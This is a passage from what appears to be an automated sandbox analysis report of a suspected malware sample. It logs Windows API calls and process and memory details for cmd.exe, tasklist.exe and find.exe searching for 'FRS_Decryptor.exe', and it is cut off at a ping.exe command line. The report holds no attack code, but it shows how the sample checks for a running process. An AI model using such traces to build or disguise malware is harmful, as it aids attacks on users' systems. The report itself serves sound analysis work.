_MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.940] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0124.941] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0124.941] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0124.941] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0124.941] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xdff3a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdff3ec | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xdff3ec*(hProcess=0x60, hThread=0x54, dwProcessId=0x5e4, dwThreadId=0x770)) returned 1 [0124.943] CloseHandle (hObject=0x54) returned 1 [0124.943] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0124.943] GetEnvironmentStringsW () returned 0x104ad78* [0124.943] FreeEnvironmentStringsA (penv="=") returned 1 [0124.943] DeleteProcThreadAttributeList (in: lpAttributeList=0xdff418 | out: lpAttributeList=0xdff418) [0124.943] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0124.943] _close (_FileHandle=4) returned 0 [0124.943] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0125.427] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xdff760 | out: lpExitCode=0xdff760*=0x0) returned 1 [0125.427] CloseHandle (hObject=0x64) returned 1 [0125.427] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0125.429] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xdff760 | out: lpExitCode=0xdff760*=0x0) returned 1 [0125.429] CloseHandle (hObject=0x60) returned 1 [0125.429] _get_osfhandle (_FileHandle=1) returned 0x24c [0125.429] SetConsoleMode (hConsoleHandle=0x24c, dwMode=0x0) returned 0 [0125.429] _get_osfhandle (_FileHandle=1) returned 0x24c [0125.429] GetConsoleMode (in: hConsoleHandle=0x24c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0125.429] _get_osfhandle (_FileHandle=0) returned 0x24 [0125.429] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0125.430] SetConsoleInputExeNameW () returned 0x1 [0125.430] GetConsoleOutputCP () returned 0x1b5 [0125.430] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0125.430] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.430] exit (_Code=0) Process: id = "132" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x6d3b3000" os_pid = "0x5f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "131" os_parent_pid = "0x810" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6814 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 6815 start_va = 0xfa0000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 6816 start_va = 0xfc0000 end_va = 0xfc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 6817 start_va = 0xfd0000 end_va = 0xfdefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 6818 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 6819 start_va = 0x1020000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 6820 start_va = 0x1060000 end_va = 0x1063fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001060000" filename = "" Region: id = 6821 start_va = 0x1070000 end_va = 0x1070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 6822 start_va = 0x1080000 end_va = 0x1081fff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 6823 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6824 start_va = 0x7e390000 end_va = 0x7e3b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e390000" filename = "" Region: id = 6825 start_va = 0x7e3bb000 end_va = 0x7e3bdfff entry_point = 0x0 region_type = private name = "private_0x000000007e3bb000" filename = "" Region: id = 6826 start_va = 0x7e3be000 end_va = 0x7e3befff entry_point = 0x0 region_type = private name = "private_0x000000007e3be000" filename = "" Region: id = 6827 start_va = 0x7e3bf000 end_va = 0x7e3bffff entry_point = 0x0 region_type = private name = "private_0x000000007e3bf000" filename = "" Region: id = 6828 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6829 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6830 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6831 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6851 start_va = 0x1210000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 6852 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6853 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6854 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6859 start_va = 0xfa0000 end_va = 0xfaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 6860 start_va = 0xfb0000 end_va = 0xfb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 6861 start_va = 0xfc0000 end_va = 0xfc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 6862 start_va = 0x1090000 end_va = 0x110dfff entry_point = 0x1090000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6863 start_va = 0x1110000 end_va = 0x1110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 6864 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 6865 start_va = 0x1130000 end_va = 0x1130fff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 6866 start_va = 0x1140000 end_va = 0x1143fff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 6867 start_va = 0x1150000 end_va = 0x1150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 6868 start_va = 0x1160000 end_va = 0x1160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 6869 start_va = 0x1170000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 6870 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 6871 start_va = 0x1220000 end_va = 0x1361fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 6872 start_va = 0x1390000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 6873 start_va = 0x1400000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 6874 start_va = 0x1500000 end_va = 0x1687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001500000" filename = "" Region: id = 6875 start_va = 0x1690000 end_va = 0x1810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001690000" filename = "" Region: id = 6876 start_va = 0x1820000 end_va = 0x2c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001820000" filename = "" Region: id = 6877 start_va = 0x2c20000 end_va = 0x2ef4fff entry_point = 0x2c20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6878 start_va = 0x2f00000 end_va = 0x32fbfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f00000" filename = "" Region: id = 6879 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 6880 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 6881 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 6882 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6883 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6884 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6885 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 6886 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 6887 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 6888 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 6889 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 6890 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6891 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 6892 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 6893 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6894 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6895 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6896 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6897 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6898 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6899 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6900 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6901 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6902 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6903 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6904 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6905 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6906 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 6907 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6908 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6909 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6910 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6911 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6912 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6913 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6914 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6915 start_va = 0x7e290000 end_va = 0x7e38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e290000" filename = "" Region: id = 6916 start_va = 0x7e3b8000 end_va = 0x7e3bafff entry_point = 0x0 region_type = private name = "private_0x000000007e3b8000" filename = "" Region: id = 6917 start_va = 0x13a0000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 6918 start_va = 0x3300000 end_va = 0x333ffff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 6919 start_va = 0x3340000 end_va = 0x337ffff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 6920 start_va = 0x3380000 end_va = 0x33bffff entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 6921 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 6922 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 6923 start_va = 0x7e28d000 end_va = 0x7e28ffff entry_point = 0x0 region_type = private name = "private_0x000000007e28d000" filename = "" Region: id = 6924 start_va = 0x7e3b5000 end_va = 0x7e3b7fff entry_point = 0x0 region_type = private name = "private_0x000000007e3b5000" filename = "" Thread: id = 377 os_tid = 0x6b0 Thread: id = 379 os_tid = 0x828 Thread: id = 380 os_tid = 0x9e8 Thread: id = 381 os_tid = 0x9f8 Process: id = "133" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x61a02000" os_pid = "0x5e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "131" os_parent_pid = "0x810" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6833 start_va = 0x750000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6834 start_va = 0x770000 end_va = 0x771fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 6835 start_va = 0x780000 end_va = 0x78efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 6836 start_va = 0x790000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 6837 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 6838 start_va = 0x810000 end_va = 0x813fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 6839 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 6840 start_va = 0x830000 end_va = 0x831fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 6841 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 6842 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6843 start_va = 0x7eca0000 end_va = 0x7ecc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eca0000" filename = "" Region: id = 6844 start_va = 0x7ecc5000 end_va = 0x7ecc5fff entry_point = 0x0 region_type = private name = "private_0x000000007ecc5000" filename = "" Region: id = 6845 start_va = 0x7ecca000 end_va = 0x7eccafff entry_point = 0x0 region_type = private name = "private_0x000000007ecca000" filename = "" Region: id = 6846 start_va = 0x7eccd000 end_va = 0x7eccffff entry_point = 0x0 region_type = private name = "private_0x000000007eccd000" filename = "" Region: id = 6847 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6848 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6849 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6850 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6855 start_va = 0x8c0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 6856 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6857 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6858 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6925 start_va = 0x750000 end_va = 0x75ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 6926 start_va = 0x760000 end_va = 0x763fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 6927 start_va = 0x770000 end_va = 0x773fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 6928 start_va = 0x840000 end_va = 0x8bdfff entry_point = 0x840000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6929 start_va = 0x9c0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 6930 start_va = 0xbf0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 6931 start_va = 0x73360000 end_va = 0x7336efff entry_point = 0x73360000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 6932 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 6933 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6934 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6935 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6936 start_va = 0x7eba0000 end_va = 0x7ec9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eba0000" filename = "" Thread: id = 378 os_tid = 0x770 Process: id = "134" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x63794000" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping 